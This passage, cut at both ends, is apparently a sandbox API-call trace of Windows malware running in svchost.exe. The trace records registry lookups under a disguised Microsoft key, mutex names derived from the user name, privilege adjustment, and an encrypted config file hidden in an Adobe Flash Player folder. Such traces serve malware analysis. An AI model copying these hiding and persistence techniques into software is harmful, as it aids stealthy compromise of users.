phkResult=0x725f348*=0x13c) returned 0x0 [0120.183] RegQueryValueExW (in: hKey=0x13c, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x725f374, lpData=0x0, lpcbData=0x725f358*=0x0 | out: lpType=0x725f374*=0x0, lpData=0x0, lpcbData=0x725f358*=0x0) returned 0x2 [0120.183] RegCloseKey (hKey=0x13c) returned 0x0 [0120.183] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0120.183] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x725f34c | out: lpFileSize=0x725f34c*=0) returned 1 [0120.183] CloseHandle (hObject=0x13c) returned 1 [0120.183] GetLastError () returned 0x0 [0120.184] GetLastError () returned 0x0 [0120.184] GetLocalTime (in: lpSystemTime=0x725f358 | out: lpSystemTime=0x725f358*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x251)) [0120.184] GetCurrentThreadId () returned 0xd6c [0120.184] GetCurrentProcessId () returned 0x2ec [0120.184] wvnsprintfW (in: pszDest=0x5401118, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725f2fc | out: pszDest="[13.10.2016 15:43:22] ver=2.2.5, log=0x0005, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0120.184] wvnsprintfW (in: pszDest=0x54011c4, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x725f37c | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0120.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0005, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0005, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5402128, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0005, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0005, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0005, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54021c0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0005, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.186] GetSystemTime (in: lpSystemTime=0x725ef48 | out: lpSystemTime=0x725ef48*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x261)) [0120.187] SystemTimeToFileTime (in: lpSystemTime=0x725ef48, lpFileTime=0x725ef38 | out: lpFileTime=0x725ef38) returned 1 [0120.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412098, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.187] GetUserNameExW () returned 0x1 [0120.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413188, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.188] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="8A") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="00") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="00") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="00") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="B7") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="49") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="67") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="98") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="F6") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="14") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="59") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="35") returned 2 [0120.189] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="AA") returned 2 [0120.190] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="3E") returned 2 [0120.190] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="27") returned 2 [0120.190] wvnsprintfW (in: pszDest=0x725ed30, cchDest=6, pszFmt="%02X", arglist=0x725ed0c | out: pszDest="60") returned 2 [0120.190] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x198 [0120.190] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0120.190] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.190] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.190] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.191] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.191] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.191] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.191] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.191] GetCurrentThread () returned 0xfffffffe [0120.191] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725ef94 | out: TokenHandle=0x725ef94*=0x0) returned 0 [0120.191] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725ef94 | out: TokenHandle=0x725ef94*=0x19c) returned 1 [0120.191] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725ef9c | out: lpLuid=0x725ef9c*(LowPart=0x8, HighPart=0)) returned 1 [0120.193] AdjustTokenPrivileges (in: TokenHandle=0x19c, DisableAllPrivileges=0, NewState=0x725ef98*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.193] GetLastError () returned 0x0 [0120.193] CloseHandle (hObject=0x19c) returned 1 [0120.193] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.193] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x725efcc, pSacl=0x725efc0, lpbSaclDefaulted=0x725efc8 | out: lpbSaclPresent=0x725efcc, pSacl=0x725efc0, lpbSaclDefaulted=0x725efc8) returned 1 [0120.193] SetNamedSecurityInfoW () returned 0x0 [0120.275] LocalFree (hMem=0x52142e0) returned 0x0 [0120.275] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.275] GetCurrentThread () returned 0xfffffffe [0120.275] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725ef94 | out: TokenHandle=0x725ef94*=0x0) returned 0 [0120.276] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725ef94 | out: TokenHandle=0x725ef94*=0x19c) returned 1 [0120.276] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725ef9c | out: lpLuid=0x725ef9c*(LowPart=0x8, HighPart=0)) returned 1 [0120.277] AdjustTokenPrivileges (in: TokenHandle=0x19c, DisableAllPrivileges=0, NewState=0x725ef98*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.277] GetLastError () returned 0x0 [0120.277] CloseHandle (hObject=0x19c) returned 1 [0120.277] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.277] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x725efcc, pSacl=0x725efc0, lpbSaclDefaulted=0x725efc8 | out: lpbSaclPresent=0x725efcc, pSacl=0x725efc0, lpbSaclDefaulted=0x725efc8) returned 1 [0120.277] SetNamedSecurityInfoW () returned 0x0 [0120.280] LocalFree (hMem=0x52142e0) returned 0x0 [0120.281] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0120.281] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x725efe0 | out: lpFileSize=0x725efe0*=2193) returned 1 [0120.281] VirtualAlloc (lpAddress=0x0, dwSize=0x891, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.281] ReadFile (in: hFile=0x19c, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0x891, lpNumberOfBytesRead=0x725efec, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x725efec*=0x891, lpOverlapped=0x0) returned 1 [0120.284] CloseHandle (hObject=0x19c) returned 1 [0120.284] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x725ef30 | out: pszDest="1476366141") returned 10 [0120.285] wvnsprintfA (in: pszDest=0x5413928, cchDest=21, pszFmt="%d", arglist=0x725ef30 | out: pszDest="1476366141") returned 10 [0120.286] wvnsprintfA (in: pszDest=0x5413a28, cchDest=21, pszFmt="%d", arglist=0x725ef30 | out: pszDest="1476366142") returned 10 [0120.287] wvnsprintfA (in: pszDest=0x54138a8, cchDest=21, pszFmt="%d", arglist=0x725ef30 | out: pszDest="1476366142") returned 10 [0120.288] wvnsprintfA (in: pszDest=0x54139a8, cchDest=21, pszFmt="%d", arglist=0x725ef30 | out: pszDest="1476366147") returned 10 [0120.289] wvnsprintfA (in: pszDest=0x5413868, cchDest=21, pszFmt="%d", arglist=0x725ef30 | out: pszDest="1476366147") returned 10 [0120.290] wvnsprintfA (in: pszDest=0x5413908, cchDest=21, pszFmt="%d", arglist=0x725ef30 | out: pszDest="1476366202") returned 10 [0120.292] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0120.294] WriteFile (in: hFile=0x19c, lpBuffer=0x54058b8*, nNumberOfBytesToWrite=0x993, lpNumberOfBytesWritten=0x725efe4, lpOverlapped=0x0 | out: lpBuffer=0x54058b8*, lpNumberOfBytesWritten=0x725efe4, lpOverlapped=0x0) returned 1 [0120.295] CloseHandle (hObject=0x19c) returned 1 [0120.301] ReleaseMutex (hMutex=0x198) returned 1 [0120.302] CloseHandle (hObject=0x198) returned 1 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0120.302] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="9C") returned 2 [0120.302] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="00") returned 2 [0120.302] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="00") returned 2 [0120.302] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="00") returned 2 [0120.302] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="BA") returned 2 [0120.302] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="47") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="AD") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="E6") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="B5") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="E6") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="0F") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="DC") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="43") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="70") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="F3") returned 2 [0120.303] wvnsprintfW (in: pszDest=0x725f170, cchDest=6, pszFmt="%02X", arglist=0x725f14c | out: pszDest="B5") returned 2 [0120.303] CreateEventW (lpEventAttributes=0x4ece89c, bManualReset=0, bInitialState=0, lpName="9C000000BA47ADE6B5E60FDC4370F3B5") returned 0x198 [0120.303] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x0) returned 0x102 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="D5") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="00") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="00") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="00") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="C7") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="0E") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="48") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="D5") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="40") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="82") returned 2 [0120.304] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="51") returned 2 [0120.305] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="02") returned 2 [0120.305] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="6F") returned 2 [0120.305] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="4B") returned 2 [0120.305] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="DA") returned 2 [0120.305] wvnsprintfW (in: pszDest=0x725e2f0, cchDest=6, pszFmt="%02X", arglist=0x725e2cc | out: pszDest="97") returned 2 [0120.305] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="D5000000C70E48D5408251026F4BDA97") returned 0x19c [0120.305] WaitForSingleObject (hHandle=0x19c, dwMilliseconds=0xffffffff) returned 0x0 [0120.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x725e1f6, cbMultiByte=4, lpWideCharStr=0x4ed1060, cchWideChar=10 | out: lpWideCharStr="Fabo") returned 4 [0120.305] PathCombineW (in: pszDest=0x4ed0ff8, pszDir="SOFTWARE\\Microsoft", pszFile="Fabo" | out: pszDest="SOFTWARE\\Microsoft\\Fabo") returned="SOFTWARE\\Microsoft\\Fabo" [0120.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x725e214, cbMultiByte=6, lpWideCharStr=0x4ed1060, cchWideChar=10 | out: lpWideCharStr="Vipoug") returned 6 [0120.306] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x725e218 | out: phkResult=0x725e218*=0x1a4) returned 0x0 [0120.306] RegQueryValueExW (in: hKey=0x1a4, lpValueName="Vipoug", lpReserved=0x0, lpType=0x725e240, lpData=0x0, lpcbData=0x725e228*=0x0 | out: lpType=0x725e240*=0x0, lpData=0x0, lpcbData=0x725e228*=0x0) returned 0x2 [0120.306] RegCloseKey (hKey=0x1a4) returned 0x0 [0120.306] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x725e4bc | out: phkResult=0x725e4bc*=0x1a4) returned 0x0 [0120.306] RegQueryValueExW (in: hKey=0x1a4, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x725e4e8, lpData=0x0, lpcbData=0x725e4cc*=0x0 | out: lpType=0x725e4e8*=0x0, lpData=0x0, lpcbData=0x725e4cc*=0x0) returned 0x2 [0120.306] RegCloseKey (hKey=0x1a4) returned 0x0 [0120.306] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0120.307] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x725e4c0 | out: lpFileSize=0x725e4c0*=0) returned 1 [0120.307] CloseHandle (hObject=0x1a4) returned 1 [0120.307] GetLastError () returned 0x0 [0120.307] GetLastError () returned 0x0 [0120.307] GetLocalTime (in: lpSystemTime=0x725e4d0 | out: lpSystemTime=0x725e4d0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x2ce)) [0120.307] GetCurrentThreadId () returned 0xd6c [0120.307] GetCurrentProcessId () returned 0x2ec [0120.307] wvnsprintfW (in: pszDest=0x54010a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725e474 | out: pszDest="[13.10.2016 15:43:22] ver=2.2.5, log=0x0008, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0120.307] wvnsprintfW (in: pszDest=0x540114c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x725e4f0 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0120.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0008, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0008, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5402238, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0008, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0008, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0008, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54020b0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0008, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.308] GetSystemTime (in: lpSystemTime=0x725e0c0 | out: lpSystemTime=0x725e0c0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x2ce)) [0120.308] SystemTimeToFileTime (in: lpSystemTime=0x725e0c0, lpFileTime=0x725e0b0 | out: lpFileTime=0x725e0b0) returned 1 [0120.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x54120d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.309] GetUserNameExW () returned 0x1 [0120.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x54131c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="8A") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="00") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="00") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="00") returned 2 